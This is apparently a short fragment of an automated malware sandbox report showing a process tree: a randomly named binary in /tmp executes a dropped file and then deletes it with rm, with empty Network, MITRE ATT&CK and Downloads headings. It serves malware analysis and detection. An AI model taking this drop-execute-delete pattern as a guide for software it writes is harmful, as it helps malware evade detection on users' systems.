/tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK./zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- Executes dropped EXE
PID:1040
-
-
/bin/rmrm zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵PID:1041
-
Network
MITRE ATT&CK Enterprise v15
Downloads